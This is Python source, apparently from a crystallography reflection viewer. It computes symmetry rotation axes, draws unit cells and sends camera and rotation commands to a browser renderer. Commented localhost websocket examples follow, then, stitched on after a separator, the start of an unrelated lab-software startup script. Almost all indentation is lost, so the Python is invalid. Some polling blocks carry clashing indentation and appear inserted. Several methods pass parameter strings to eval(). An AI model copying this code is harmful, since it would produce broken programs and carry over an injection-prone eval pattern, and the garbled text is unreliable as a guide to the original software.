%(s1, s2, s3, t1, t2, t3, r, g, b, label, name, radius, labelpos) )
if name=="":
self.mprint("deferred rendering vector from (%s, %s, %s) to (%s, %s, %s)" %(s1, s2, s3, t1, t2, t3), verbose=2)
def get_cartesian_vector_angles(self, s1, s2, s3, t1, t2, t3):
svec = [t1-s1, t2-s2, t3-s3]
xyvec = svec[:] # copy so svec is left unchanged
xyvec[2] = 0.0 # projection vector of svec in the xy plane
xyvecnorm = math.sqrt( xyvec[0]*xyvec[0] + xyvec[1]*xyvec[1] )
if xyvecnorm > 0.0:
angle_x_xyvec = math.acos( xyvec[0]/xyvecnorm )*180.0/math.pi
angle_y_xyvec = math.acos( xyvec[1]/xyvecnorm )*180.0/math.pi
else:
angle_x_xyvec = 90.0
angle_y_xyvec = 90.0
yzvec = svec[:]
yzvec[0] = 0.0 # projection vector of svec in the yz plane
yzvecnorm = math.sqrt( yzvec[1]*yzvec[1] + yzvec[2]*yzvec[2] )
if yzvecnorm > 0.0:
angle_y_yzvec = math.acos( yzvec[1]/yzvecnorm )*180.0/math.pi
angle_z_yzvec = math.acos( yzvec[2]/yzvecnorm )*180.0/math.pi
else:
angle_y_yzvec = 90.0
angle_z_yzvec = 90.0
svecnorm = math.sqrt( svec[0]*svec[0] + svec[1]*svec[1] + svec[2]*svec[2] )
angle_x_svec = math.acos( svec[0]/svecnorm )*180.0/math.pi
angle_y_svec = math.acos( svec[1]/svecnorm )*180.0/math.pi
angle_z_svec = math.acos( svec[2]/svecnorm )*180.0/math.pi
if angle_y_svec > 90.0:
angle_x_xyvec = -angle_x_xyvec
self.mprint("angles in xy plane to x,y axis are: %s, %s" %(angle_x_xyvec, angle_y_xyvec), verbose=2)
self.mprint("angles in yz plane to y,z axis are: %s, %s" %(angle_y_yzvec, angle_z_yzvec), verbose=2)
self.mprint("angles to x,y,z axis are: %s, %s, %s" %(angle_x_svec, angle_y_svec, angle_z_svec ), verbose=2)
return angle_x_xyvec, angle_z_svec
def PointVectorPerpendicularToScreen(self, angle_x_xyvec, angle_z_svec):
rotmx = self.Euler2RotMatrix(( angle_x_xyvec, angle_z_svec + 180.0, 0.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
return rotmx
def PointVectorParallelToScreen(self, angle_x_xyvec, angle_z_svec):
rotmx = self.Euler2RotMatrix(( angle_x_xyvec, angle_z_svec + 90.0, 90.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
return rotmx
def GetVectorAndAngleFromRotationMx(self, rot):
RotMx = matrix.sqr(rot.as_double())
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
ortrotmx = (OrtMx * RotMx * InvMx)
isProperRotation = True
ortrot = ortrotmx.as_mat3()
label=""
order = 0
if not ortrotmx.is_r3_rotation_matrix():
isProperRotation = False
self.mprint("""Warning! The operation '%s' is not a proper rotation
in the space group %s\nwith unit cell %s\n""" \
%(rot.as_hkl(), self.miller_array.space_group().info().symbol_and_number(), str(uc) ))
self.mprint("Inverse of implied rotation matrix,\n%s\nis not equal to its transpose,\n%s" \
%(str(roundoff(ortrotmx.inverse(),4)), str(roundoff(ortrotmx.transpose(),4))), verbose=1)
improper_vec_angle = scitbx.math.r3_rotation_axis_and_angle_from_matrix(ortrot)
self.mprint("\nTrying to find nearest orthonormal matrix approximtion")
Rmx = matrix.find_nearest_orthonormal_matrix(ortrotmx)
self.mprint("New suggested rotation matrix is\n%s" %str(roundoff(Rmx,4)), verbose=1)
if not Rmx.is_r3_rotation_matrix():
self.mprint("Failed finding an approximate rotation matrix!")
return (0,0,0), 0.0, label, order
ortrotmx = Rmx
ortrot = ortrotmx.as_mat3()
r11,r12,r13,r21,r22,r23,r31,r32,r33 = ortrot
theta = math.acos(roundoff((r11+r22+r33-1.0)*0.5, 10))
rotaxis = flex.vec3_double([(0,0,0)])
self.mprint(str(ortrot), verbose=2)
vec_angle = scitbx.math.r3_rotation_axis_and_angle_from_matrix(ortrot)
rotaxis = flex.vec3_double([ vec_angle.axis ])
if not isProperRotation:
# Divine revelation: The new proper rotation from above axis is halfway
# of being correctly aligned so subtract it from twice the improper axis
# to get the desired rotation axis vector
improp_rotaxis = flex.vec3_double([ improper_vec_angle.axis ])
rotaxis = 2*rotaxis - improp_rotaxis
# for debugging deduce the corresponding rotation matrix from this new axis
usedrotmx = scitbx.math.r3_rotation_axis_and_angle_as_matrix( rotaxis[0], theta )
self.mprint("Final proper rotation matrix:\n%s" %str(roundoff(matrix.sqr(usedrotmx),4)), verbose=1)
## adjust the length of the rotation axes to be compatible with the sphere of reflections
#s = math.sqrt(OrtMx.transpose().norm_sq())*self.realspace_scale
if abs(theta) > 0.0001 and rotaxis.norm() > 0.01: # avoid nullvector
order = int(roundoff(2*math.pi/theta, 0)) # how many times to rotate before it's the identity operator
label = "%s-fold" %str(order)
return tuple((rotaxis)[0]), theta, label, order
#return tuple((s*rotaxis)[0]), theta, label, order
def show_rotation_axes(self):
if self.viewerparams.show_symmetry_rotation_axes:
for i, (opnr, label, order, v, hklop, hkl, abc) in enumerate( self.rotation_operators ):
if i < len(self.rotation_operators)-1:
self.draw_cartesian_vector(0, 0, 0, v[0], v[1], v[2], label=label, radius=0.2, labelpos=1.0)
else: # supply name to tell javascript to draw all these vectors
self.draw_cartesian_vector(0, 0, 0, v[0], v[1], v[2], label=label, name="SymRotAxes", radius=0.2, labelpos=1.0)
else:
self.RemovePrimitives("SymRotAxes")
def calc_rotation_axes(self):
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ] # avoid duplicate rotation matrices
self.rotation_operators = []
for i,op in enumerate(unique_rot_ops):
(cartvec, a, label, order) = self.GetVectorAndAngleFromRotationMx( op.r() )
if label != "":
self.mprint( str(i) + ": " + str(roundoff(cartvec)) + ", " + label, verbose=1)
self.rotation_operators.append( (i, label + "#%d"%i, order , cartvec, op.r().as_hkl(), "", "") )
def show_vector(self):
[i, val] = eval(self.viewerparams.show_vector)
self.visual_symmxs = []
if i < len(self.all_vectors):
(opnr, label, order, v, hklop, hkl, abc) = self.all_vectors[i]
# avoid onMessage-DrawVector in HKLJavaScripts.js misinterpreting the commas in strings like "-x,z+y,-y"
name = label + hklop.replace(",", "_")
if val:
self.currentrotvec = v # the vector used for aligning
if order > 0 and hklop != "":
# if this is a rotation operator deduce the group of successive rotation matrices it belongs to
rt = sgtbx.rt_mx(symbol= hklop, r_den=12, t_den=144)
RotMx = matrix.sqr(rt.r().as_double() )
self.visual_symmxs.append( (RotMx, rt.r().as_hkl()) )
nfoldrotmx = RotMx
nfoldrot = rt.r()
for ord in range(order -1): # skip identity operator
nfoldrotmx = RotMx * nfoldrotmx
nfoldrot = nfoldrot.multiply( rt.r() )
self.visual_symmxs.append( (nfoldrotmx, nfoldrot.as_hkl()) )
# adjust the length of the rotation axes to be compatible with the sphere of reflections
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
s = math.sqrt(OrtMx.transpose().norm_sq())*self.realspace_scale
self.currentrotvec = [s*v[0], s*v[1], s*v[2]]
self.draw_cartesian_vector(0, 0, 0, self.currentrotvec[0], self.currentrotvec[1],
self.currentrotvec[2], r=0.1, g=0.1,b=0.1,
label=label, name=name, radius=0.2, labelpos=1.0)
else:
self.RemovePrimitives(name)
self.visual_symmxs = []
self.visual_symHKLs = []
self.RemovePrimitives("sym_HKLs") # delete other symmetry hkls from a previous rotation operator if any
def visualise_sym_HKLs(self):
if len(self.visual_symHKLs):
self.RemovePrimitives("sym_HKLs")
for i,(hkl,hklstr) in enumerate(self.visual_symHKLs):
thkl = tuple(hkl)
hklstr = "H,K,L: %d,%d,%d" %thkl
if i < len(self.visual_symHKLs)-1:
self.draw_vector(0,0,0, hkl[0],hkl[1],hkl[2], isreciprocal=True, label=hklstr, r=0.5, g=0.3, b=0.3,
radius=0.1, labelpos=1.0)
else: # supplying a name for the vector last graphics primitive draws them all
self.draw_vector(0,0,0, hkl[0],hkl[1],hkl[2], isreciprocal=True, label=hklstr, name="sym_HKLs",
r=0.5, g=0.3, b=0.3, radius=0.1, labelpos=1.0)
def show_hkl(self, bigwireframe=True):
"""
Draw a wireframe sphere around a reflection selected with a double click in
the millerarraytable in the GUI
"""
rad = self.HKLscene_from_dict(self.radii_scene_id).max_radius*1.5
if not bigwireframe:
rad = self.HKLscene_from_dict(self.radii_scene_id).min_radius*0.9
self.RemovePrimitives("highlight_HKL")
if self.viewerparams.show_hkl != "deselect":
hkl = eval(self.viewerparams.show_hkl)
if self.sg.info().symbol_and_number() == self.miller_array.space_group().info().symbol_and_number():
self.draw_sphere(hkl[0],hkl[1],hkl[2], isreciprocal=True, name="highlight_HKL",
r=1, g=0.0, b=0.0, radius= rad, mesh=True)
else:
self.mprint("Cannot currently associate reflection in original space group with reflection in different space group.")
self.viewerparams.show_hkl = "" # to allow clicking on the same entry in the millerarraytable
def rotate_around_numbered_vector(self):
vecnr, deg = eval(self.params.clip_plane.angle_around_vector)
if vecnr < len(self.all_vectors):
self.rotate_components_around_cartesian_vector(self.all_vectors[vecnr][3], deg)
def rotate_components_around_cartesian_vector(self, cartvec, deg):
phi = math.pi*deg/180
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
self.RotateAxisComponents([ux,uy,uz], phi, True)
def rotate_stage_around_cartesian_vector(self, cartvec, deg):
phi = math.pi*deg/180
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
self.RotateAxisMx([ux,uy,uz], phi, True)
def animate_rotate_around_vector(self):
vecnr, speed = eval(self.params.clip_plane.animate_rotation_around_vector)
if vecnr < len(self.all_vectors):
cartvec = self.all_vectors[vecnr][3]
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
self.AnimateRotateAxisComponents([ux,uy,uz], speed, True)
def DrawUnitCell(self, scale=1):
if scale is None:
self.RemovePrimitives("unitcell")
self.mprint( "Removing real space unit cell", verbose=2)
return
rad = 0.2 # scale # * 0.05 # 1000/ uc.volume()
self.draw_vector(0,0,0, scale,0,0, False, label="a", r=0.5, g=0.8, b=0.8, radius=rad)
self.draw_vector(0,0,0, 0,scale,0, False, label="b", r=0.8, g=0.5, b=0.8, radius=rad)
self.draw_vector(0,0,0, 0,0,scale, False, label="c", r=0.8, g=0.8, b=0.5, radius=rad)
self.draw_vector(scale,0,0, scale,scale,0, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.draw_vector(0,scale,0, scale,scale,0, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.draw_vector(0,0,scale, scale,0,scale, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.draw_vector(0,0,scale, 0,scale,scale, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.draw_vector(0,scale,scale, scale,scale,scale, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.draw_vector(scale,0,scale, scale,scale,scale, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.draw_vector(scale,0,0, scale,0,scale, False, r=0.8, g=0.8, b=0.5, radius=rad)
self.draw_vector(0,scale,0, 0,scale,scale, False, r=0.8, g=0.8, b=0.5, radius=rad)
self.draw_vector(scale,scale,0, scale,scale,scale, False, r=0.8, g=0.8, b=0.5, radius=rad, name="unitcell")
self.mprint( "Adding real space unit cell", verbose=1)
def DrawReciprocalUnitCell(self, scale=1):
if scale is None:
self.RemovePrimitives("reciprocal_unitcell")
self.mprint( "Removing reciprocal unit cell", verbose=2)
return
rad = 0.2 # 0.05 * scale
self.draw_vector(0,0,0, scale,0,0, label="a*", r=0.5, g=0.3, b=0.3, radius=rad)
self.draw_vector(0,0,0, 0,scale,0, label="b*", r=0.3, g=0.5, b=0.3, radius=rad)
self.draw_vector(0,0,0, 0,0,scale, label="c*", r=0.3, g=0.3, b=0.5, radius=rad)
self.draw_vector(scale,0,0, scale,scale,0, r=0.3, g=0.5, b=0.3, radius=rad)
self.draw_vector(0,scale,0, scale,scale,0, r=0.5, g=0.3, b=0.3, radius=rad)
self.draw_vector(0,0,scale, scale,0,scale, r=0.5, g=0.3, b=0.3, radius=rad)
self.draw_vector(0,0,scale, 0,scale,scale, r=0.3, g=0.5, b=0.3, radius=rad)
self.draw_vector(0,scale,scale, scale,scale,scale, r=0.5, g=0.3, b=0.3, radius=rad)
self.draw_vector(scale,0,scale, scale,scale,scale, r=0.3, g=0.5, b=0.3, radius=rad)
self.draw_vector(scale,0,0, scale,0,scale, r=0.3, g=0.3, b=0.5, radius=rad)
self.draw_vector(0,scale,0, 0,scale,scale, r=0.3, g=0.3, b=0.5, radius=rad)
self.draw_vector(scale,scale,0, scale,scale,scale, r=0.3, g=0.3, b=0.5, radius=rad, name="reciprocal_unitcell")
self.mprint( "Adding reciprocal unit cell", verbose=1)
def GetUnitcellScales(self):
spanmin, spanmax = ( self.miller_array.index_span().min(), self.miller_array.index_span().max())
uc = self.miller_array.unit_cell()
vec = (1.0, 1.0, 1.0)
# uc.reciprocal_space_vector() only takes integer miller indices so compute
# the cartesian coordinates for real valued miller indices with the transpose of the fractionalization matrix
vec1 = vec * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_bodydiagonal_length = vec1.length()
reciprocspanmaxvec = spanmax * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_spanmax_length = reciprocspanmaxvec.length()
reciprocspanminvec = spanmin * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_spanmin_length = reciprocspanminvec.length()
reciprocspan_length = max(reciproc_spanmax_length, reciproc_spanmin_length)
self.reciproc_scale = reciprocspan_length / reciproc_bodydiagonal_length
# for real space vector
vec2 = vec * matrix.sqr(uc.orthogonalization_matrix())
bodydiagonal_length = vec2.length()
self.realspace_scale = self.scene.renderscale * reciprocspan_length / bodydiagonal_length
def project_vector1_vector2(self, vec1, vec2):
# cartesian projection of vec1 onto vec2
L1 = math.sqrt( vec1[0]*vec1[0] + vec1[1]*vec1[1] + vec1[2]*vec1[2] )
L2 = math.sqrt( vec2[0]*vec2[0] + vec2[1]*vec2[1] + vec2[2]*vec2[2] )
dotproduct = vec1[0]*vec2[0] + vec1[1]*vec2[1] + vec1[2]*vec2[2]
cosine = dotproduct/(L1*L2)
projvec1 = (vec1[0]*cosine, vec1[1]*cosine, vec1[2]*cosine)
projvec2 = (vec2[0]*cosine, vec2[1]*cosine, vec2[2]*cosine)
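# e.g. vec1 = (1,0,0), vec2 = (1,1,0) gives cosine = 1/sqrt(2) ~ 0.707 and
# projvec1 = (0.707, 0, 0)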
return cosine, projvec1, projvec2
def orient_vector_to_screen(self, cartvec):
if cartvec is None:
return
angle_x_xyvec, angle_z_svec = self.get_cartesian_vector_angles(0, 0, 0,
cartvec[0],
cartvec[1],
cartvec[2])
cartveclength = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
self.mprint( "cartveclength= %s" %roundoff(cartveclength), verbose=1)
if self.viewerparams.is_parallel:
self.PointVectorParallelToScreen(angle_x_xyvec, angle_z_svec)
else:
self.PointVectorPerpendicularToScreen(angle_x_xyvec, angle_z_svec)
def fix_orientation(self):
if self.viewerparams.fixorientation != "None":
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
def make_clip_plane(self, hkldist=0.0, clipwidth=None):
# create clip plane oriented parallel or perpendicular to abc vector
if clipwidth is None:
self.RemovePrimitives()
self.SetClipPlaneDistances(0, 0)
self.TranslateHKLpoints(0, 0, 0, 0.0)
return
self.mprint("Applying clip plane to reflections", verbose=1)
self.RemovePrimitives("clip_vector")
if self.cameraPosZ is None and self.viewmtrx is not None:
self.cameraPosZ, self.currentRotmx, self.cameratranslation = self.GetCameraPosRotTrans( self.viewmtrx)
halfdist = self.cameraPosZ + hkldist # self.viewer.boundingZ*0.5
if clipwidth == 0.0:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, -self.cameraPosZ)
self.mprint("clipnear: %s, clipfar: %s, cameraZ: %s" %(clipNear, clipFar, -self.cameraPosZ), verbose=1)
def set_camera_type(self):
self.AddToBrowserMsgQueue("SetCameraType", self.ngl_settings.camera_type)
def get_labels_of_data_for_binning(self):
self.mprint("Data can be binned according to:")
for i,e in enumerate(self.bin_labels_type_idxs):
self.mprint("%d, %s" %(i, e[0]))
def SetFontSize(self, fontsize):
msg = str(fontsize)
self.AddToBrowserMsgQueue("SetFontSize", msg)
def SetBrowserDebug(self, isdebug):
msg = str(isdebug)
self.AddToBrowserMsgQueue("SetBrowserDebug", msg)
def SetMouseSpeed(self, trackspeed):
msg = str(trackspeed)
self.AddToBrowserMsgQueue("SetMouseSpeed", msg)
#self.GetMouseSpeed() # TODO: fix wait time
def GetMouseSpeed(self):
self.ngl_settings.mouse_sensitivity = None
self.mousespeed_msg_sem.acquire()
self.AddToBrowserMsgQueue("GetMouseSpeed", "")
if self.WaitforHandshake():
nwait = 0
      # Poll the semaphore until the browser replies or ~5 seconds elapse:
      import time  # local import to avoid assuming a module level import
      while not self.mousespeed_msg_sem.acquire(blocking=False) and nwait < 5:
        time.sleep(self.sleeptime)
        nwait += self.sleeptime
        self.mprint("mousespeed_msg_sem, wait= %s" %nwait, verbose=2)
self.mousespeed_msg_sem.release()
def SetClipPlaneDistances(self, near, far, cameraPosZ=None):
if cameraPosZ is None:
cameraPosZ = self.cameraPosZ
msg = str(near) + ", " + str(far) + ", " + str(cameraPosZ)
self.AddToBrowserMsgQueue("SetClipPlaneDistances", msg)
def GetClipPlaneDistances(self):
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.clipplane_msg_sem.acquire()
self.AddToBrowserMsgQueue("GetClipPlaneDistances", "") #
if self.WaitforHandshake():
nwait = 0
      # Poll the semaphore until the browser replies or ~5 seconds elapse:
      import time  # local import to avoid assuming a module level import
      while not self.clipplane_msg_sem.acquire(blocking=False) and nwait < 5:
        time.sleep(self.sleeptime)
        nwait += self.sleeptime
        self.mprint("clipplane_msg_sem, wait= %s" %nwait, verbose=2)
self.mprint("clipnear, clipfar, cameraPosZ: %s, %s %s" \
         %(self.clipNear, self.clipFar, self.cameraPosZ), verbose=2)
self.clipplane_msg_sem.release()
return (self.clipNear, self.clipFar, self.cameraPosZ)
def GetBoundingBox(self):
self.boundingX = 0.0
self.boundingY = 0.0
self.boundingZ = 0.0
self.boundingbox_msg_sem.acquire()
self.AddToBrowserMsgQueue("GetBoundingBox", "")
if self.WaitforHandshake():
nwait = 0
      # Poll the semaphore until the browser replies or ~5 seconds elapse:
      import time  # local import to avoid assuming a module level import
      while not self.boundingbox_msg_sem.acquire(blocking=False) and nwait < 5:
        time.sleep(self.sleeptime)
        nwait += self.sleeptime
        self.mprint("boundingbox_msg_sem, wait= %s" %nwait, verbose=2)
self.mprint("boundingXYZ: %s, %s %s" \
%(self.boundingX, self.boundingY, self.boundingZ), verbose=2)
self.boundingbox_msg_sem.release()
return (self.boundingX, self.boundingY, self.boundingZ)
def RemovePrimitives(self, reprname=""):
self.AddToBrowserMsgQueue("RemovePrimitives", reprname )
def SetAutoView(self):
rotmx = self.Euler2RotMatrix( ( 0.0, 0.0, 0.0 ) )
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
self.AddToBrowserMsgQueue("SetAutoView" )
def TestNewFunction(self):
self.AddToBrowserMsgQueue("Testing")
def MakeImage(self, filename):
self.imagename = filename
self.AddToBrowserMsgQueue("MakeImage2", "HKLviewer.png,"+ str(sys.version_info[0]) )
def DisableMouseRotation(self): # disable rotating with the mouse
self.AddToBrowserMsgQueue("DisableMouseRotation")
def EnableMouseRotation(self): # enable rotating with the mouse
self.AddToBrowserMsgQueue("EnableMouseRotation")
def ReOrientStage(self):
if self.viewmtrx:
self.AddToBrowserMsgQueue("SetAutoView", self.viewmtrx)
def Euler2RotMatrix(self, eulerangles):
    radangles = [e*math.pi/180.0 for e in eulerangles]
# scitbx is using ZYZ convention for euler angles
# https://en.wikipedia.org/wiki/Euler_angles#Rotation_matrix
RotMx = scitbx.math.euler_angles_as_matrix(radangles)
return RotMx
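  # For example (illustrative only): Euler2RotMatrix((0.0, 0.0, 0.0)) returns
  # the identity matrix, and since scitbx uses the ZYZ convention,
  # Euler2RotMatrix((90.0, 0.0, 0.0)) is a 90 degree rotation about the z axis.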
def RotateMxStage(self, rotmx, quietbrowser=True):
if self.cameraPosZ is None:
return
scaleRot = rotmx * self.cameraPosZ
ortrot = scaleRot.as_mat3()
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateStage", msg)
def RotateAxisMx(self, vec, theta, quietbrowser=True):
if self.cameraPosZ is None:
return
str_rot = str(list(vec)) + ", " + str(theta)
str_rot = str_rot.replace("[", "")
str_rot = str_rot.replace("]", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateAxisStage", msg)
def RotateMxComponents(self, rotmx, quietbrowser=True):
if self.cameraPosZ is None:
return
#scaleRot = rotmx * self.cameraPosZ
ortrot = rotmx.as_mat3()
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateComponents", msg)
def RotateAxisComponents(self, vec, theta, quietbrowser=True):
if self.cameraPosZ is None:
return
str_rot = str(list(vec)) + ", " + str(theta)
str_rot = str_rot.replace("[", "")
str_rot = str_rot.replace("]", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("RotateAxisComponents", msg)
def AnimateRotateAxisComponents(self, vec, speed, quietbrowser=True):
if self.cameraPosZ is None:
return
str_rot = str(list(vec)) + ", " + str(speed)
str_rot = str_rot.replace("[", "")
str_rot = str_rot.replace("]", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.AddToBrowserMsgQueue("AnimateRotateAxisComponents", msg)
def TranslateHKLpoints(self, h, k, l, mag):
# cast this reciprocal vector into cartesian before messaging NGL to translate our HKL points
#vec = self.miller_array.unit_cell().reciprocal_space_vector((h, k, l))
hkl_vec = flex.vec3_double( [(h,k,l)])
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().orthogonalization_matrix() )
cartvec = hkl_vec * rfracmx
if cartvec.norm()==0.0 or mag==0.0:
svec = (0, 0, 0)
else:
#cartvec = (mag/cartvec.norm()) * cartvec
cartvec = (-mag*self.scene.renderscale/hkl_vec.norm()) * cartvec
#svec = [cartvec[0][0]*self.scene.renderscale, cartvec[0][1]*self.scene.renderscale, cartvec[0][2]*self.scene.renderscale ]
svec = cartvec[0]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("cartesian translation vector is: " + str(roundoff(svec)), verbose=1)
str_vec = str(svec)
str_vec = str_vec.replace("(", "")
str_vec = str_vec.replace(")", "")
msg = str_vec + "\n"
self.AddToBrowserMsgQueue("TranslateHKLpoints", msg)
def RemoveStageObjects(self):
self.AddToBrowserMsgQueue("RemoveStageObjects")
def DefineHKL_Axes(self, Hstararrowstart, Hstararrowend, Kstararrowstart,
Kstararrowend, Lstararrowstart, Lstararrowend,
Hlabelpos, Klabelpos, Llabelpos):
strdata = ""
strdata += "%s\n\n" %str(Hstararrowstart)
strdata += "%s\n\n" %str(Hstararrowend)
strdata += "%s\n\n" %str(Kstararrowstart)
strdata += "%s\n\n" %str(Kstararrowend)
strdata += "%s\n\n" %str(Lstararrowstart)
strdata += "%s\n\n" %str(Lstararrowend)
strdata += "%s\n\n" %str(Hlabelpos)
strdata += "%s\n\n" %str(Klabelpos)
strdata += "%s\n\n" %str(Llabelpos)
self.AddToBrowserMsgQueue("DefineHKL_Axes", strdata)
def SendCoordinates2Browser(self, positions, colours, radii, ttipids ):
strdata = ""
strdata += "%s\n\n" %roundoff(positions, 2)
strdata += "%s\n\n" %roundoff(colours, 2)
strdata += "%s\n\n" %roundoff(radii, 2)
strdata += "%s" %ttipids
self.AddToBrowserMsgQueue("AddSpheresBin2ShapeBuffer", strdata)
def RenderStageObjects(self):
self.AddToBrowserMsgQueue("RenderStageObjects")
def MakeColourChart(self, ctop, cleft, label, fomlabel, colourgradarray):
msg = "%s\n\n%s\n\n%s\n\n%s\n\n%s" %(ctop, cleft, label, fomlabel, str(colourgradarray) )
self.AddToBrowserMsgQueue("MakeColourChart", msg )
def get_current_datatype(self):
# Amplitudes, Map coeffs, weights, floating points, etc
if self.viewerparams.scene_id is None:
return None
return self.array_info_format_tpl[ self.scene_id_to_array_id(self.viewerparams.scene_id )][1][1]
def onClickColourChart(self):
# if running the GUI show the colour chart selection dialog
self.SendInfoToGUI( { "ColourChart": self.viewerparams.color_scheme,
"ColourPowerScale": self.viewerparams.color_powscale,
"Datatype": self.get_current_datatype(),
"ShowColourMapDialog": 1
} )
def MakeBrowserDataColumnComboBox(self):
datcolstr = ""
for i,lbl in enumerate(self.hkl_scenes_infos):
datcolstr = datcolstr + ",".join(lbl[3]) + "\n" + str(i)
if i < len(self.hkl_scenes_infos)-1:
datcolstr = datcolstr + "\n\n"
datcolstr = datcolstr + "\n\n" + str(self.viewerparams.scene_id)
self.AddToBrowserMsgQueue("MakeBrowserDataColumnComboBox", datcolstr)
ngl_philstr = """
mouse_sensitivity = 0.02
.type = float
bin_opacities = ""
.type = str
tooltip_alpha = 0.80
.type = float
fontsize = 9
.type = int
show_tooltips = none *click hover
.type = choice
camera_type = *orthographic perspective
.type = choice
"""
NGLmaster_phil = libtbx.phil.parse( ngl_philstr )
NGLparams = NGLmaster_phil.fetch().extract()
def reset_NGLsettings():
"""
Reset NGL settings to their default values as specified in the phil definition string
"""
  # The global statement ensures the assignment rebinds the module level
  # NGLparams rather than creating a function local variable:
  global NGLparams
  NGLparams = NGLmaster_phil.fetch(source = libtbx.phil.parse( ngl_philstr) ).extract()
def NGLsettings():
"""
Get a global phil parameters object containing some NGL settings
"""
#global NGLparams
return NGLparams
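# A minimal sketch of how these phil objects are typically used (illustrative
# only, assuming standard libtbx.phil semantics): user supplied phil text is
# merged over the master definitions and extracted to a plain python object.
# user_phil = libtbx.phil.parse("fontsize = 12")
# params = NGLmaster_phil.fetch(source=user_phil).extract()
# params.fontsize     # -> 12, overriding the default of 9
# params.camera_type  # -> "orthographic", the starred default choice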
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
#websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
# WS server example
import asyncio
import websockets
async def hello(websocket, path):
while True:
name = await websocket.recv()
print(f"< {name}")
greeting = f"Hello {name}!"
await websocket.send(greeting)
if name=="STOP":
return
await asyncio.sleep(0.2)
start_server = websockets.serve(hello, "localhost", 8765)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
# WS client example
import asyncio
import websockets
async def hello():
uri = "ws://localhost:8765"
async with websockets.connect(uri) as websocket:
while True:
name = input("What's your name?\n" )
await websocket.send(name)
print(f"> {name}")
greeting = await websocket.recv()
print(f"< {greeting}")
asyncio.get_event_loop().run_until_complete(hello())
"""
|
__main__.py
|
from __future__ import division, unicode_literals, print_function, absolute_import # Ease the transition to Python 3
import os
import labscript_utils.excepthook
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.10.0', '3')
# Splash screen
from labscript_utils.splash import Splash
splash = Splash(os.path.join(os.path.dirname(__file__), 'lyse.svg'))
splash.show()
splash.update_text('importing standard library modules')
# stdlib imports
import sys
import socket
import logging
import threading
import signal
import subprocess
import time
import traceback
import pprint
import ast
# 3rd party imports:
splash.update_text('importing numpy')
import numpy as np
splash.update_text('importing h5_lock and h5py')
import labscript_utils.h5_lock
import h5py
splash.update_text('importing pandas')
import pandas
splash.update_text('importing Qt')
check_version('qtutils', '2.2.2', '3.0.0')
splash.update_text('importing labscript suite modules')
check_version('labscript_utils', '2.12.4', '3')
from labscript_utils.ls_zprocess import ZMQServer, ProcessTree
import zprocess
from labscript_utils.labconfig import LabConfig, config_prefix
from labscript_utils.setup_logging import setup_logging
